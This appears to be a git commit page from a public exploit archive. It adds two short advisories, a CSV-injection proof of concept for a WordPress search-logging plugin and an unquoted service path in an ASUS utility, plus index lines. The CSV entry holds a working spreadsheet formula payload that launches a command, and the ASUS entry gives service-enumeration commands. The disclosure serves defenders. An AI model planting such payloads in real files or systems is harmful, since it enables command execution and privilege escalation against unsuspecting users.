DB: 2020-03-12
2 changes to exploits/shellcodes ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path Wordpress Plugin Search Meter 2.13.2 - CSV injection
This commit is contained in:
Offensive Security
parent
0a0ad49d15
commit
3c74040d79
3 changed files with 63 additions and 0 deletions
27
exploits/php/webapps/48197.txt
Normal file
27
exploits/php/webapps/48197.txt
Normal file
|
|
@ -0,0 +1,27 @@
|
|||
# Exploit Title: Wordpress Plugin Search Meter 2.13.2 - CSV Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-03-10
|
||||
# Exploit Author: Daniel Monzón (stark0de)
|
||||
# Vendor Homepage: https://thunderguy.com/semicolon/
|
||||
# Software Link: https://downloads.wordpress.org/plugin/search-meter.2.13.2.zip
|
||||
# Version: 2.13.2
|
||||
# Tested on: Windows 7 x86 SP1
|
||||
# CVE : N/A
|
||||
|
||||
There is a CSV injection vulnerability in the Export function of the Search Meter plugin version
|
||||
|
||||
1) First we introduce the payload in the search bar in Wordpress
|
||||
|
||||
=cmd|' /C notepad'!'A1'
|
||||
|
||||
|
||||
2) Then we go to http://127.0.0.1/wordpress/wp-admin/index.php?page=search-meter%2Fadmin.php and export the CSV file
|
||||
|
||||
|
||||
3) After that we open the file in Excel, and import data from an external file, using comma as separator
|
||||
|
||||
|
||||
4) Payload gets executed
|
||||
|
||||
|
||||
Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016
|
||||
34
exploits/windows/local/48193.txt
Normal file
34
exploits/windows/local/48193.txt
Normal file
|
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path
|
||||
# Discovery by: Roberto Piña
|
||||
# Discovery Date: 2020-03-10
|
||||
# Vendor Homepage: https://www.asus.com/
|
||||
# Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3_Win10_H97M-Pro_V10102.zip?_ga=2.170180192.1334401606.1583873755-790266082.1583873755
|
||||
# Tested Version: 1.02.00
|
||||
# Vulnerability Type: Unquoted Service Path
|
||||
# Tested on OS: Windows 10 Home x64 en
|
||||
|
||||
# Step to discover Unquoted Service Path:
|
||||
|
||||
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "asComSvc" | findstr /i /v """
|
||||
ASUS Com Service asComSvc C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe Auto
|
||||
|
||||
C:\>sc qc asComSvc
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: asComSvc
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : ASUS Com Service
|
||||
DEPENDENCIES : RpcSs
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
#Exploit:
|
||||
# A successful attempt would require the local user to be able to insert their code in the system root path
|
||||
# undetected by the OS or other security applications where it could potentially be executed during
|
||||
# application startup or reboot. If successful, the local user's code would execute with the elevated
|
||||
# privileges of the application.
|
||||
|
|
@ -10987,6 +10987,7 @@ id,file,description,date,author,type,platform,port
|
|||
48180,exploits/windows/local/48180.cpp,"Microsoft Windows - 'WizardOpium' Local Privilege Escalation",2020-03-03,piotrflorczyk,local,windows,
|
||||
48185,exploits/linux/local/48185.rb,"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)",2020-03-09,Metasploit,local,linux,
|
||||
48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,
|
||||
48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
|
@ -42455,3 +42456,4 @@ id,file,description,date,author,type,platform,port
|
|||
48188,exploits/java/webapps/48188.txt,"Sysaid 20.1.11 b26 - Remote Command Execution",2020-03-10,"Ahmed Sherif",webapps,java,
|
||||
48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php,
|
||||
48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php,
|
||||
48197,exploits/php/webapps/48197.txt,"Wordpress Plugin Search Meter 2.13.2 - CSV injection",2020-03-11,"Daniel Monzón",webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue